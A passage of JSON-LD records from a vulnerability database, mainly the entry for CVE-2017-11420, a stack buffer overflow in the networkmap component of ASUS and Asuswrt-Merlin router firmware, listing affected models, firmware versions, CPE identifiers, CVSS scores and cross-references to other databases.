            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "date": "2017-07-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "date": "2017-07-17T13:18:20.953000",
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-29T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "date": "2017-09-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS For devices  Asuswrt-Merlin Firmware and  ASUS Firmware network map stack buffer overflow vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201707-0535

    Vulnerability from variot - Updated: 2025-04-20 23:27

    Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0535",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac68u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12\\+",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.378.7177"
          },
          {
            "model": "rt-ac66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac5300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n18u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt ac1200g",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3167"
          },
          {
            "model": "rt ac1900p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12hp",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt ac1200gu",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.5577"
          },
          {
            "model": "rt-n12hp b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt-ac51u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n16",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac3100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac1200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac52u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.4180"
          },
          {
            "model": "rt-ac68p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac53",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt-n12d1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac88u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac3200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac58u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7485"
          },
          {
            "model": "rt-ac55u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac66u b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt ac1200g",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3167"
          },
          {
            "model": "rt-n12d1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12\\+",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12hp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt-ac53",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac1200",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n300",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          }
        ]
      },
      "cve": "CVE-2017-11420",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-11420",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-24400",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-101841",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-11420",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-11420",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-11420",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-24400",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201707-754",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-101841",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2017/07/13/1",
            "trust": 3.1
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "id": "VAR-201707-0535",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          }
        ],
        "trust": 1.342782942
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:27:22.844000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
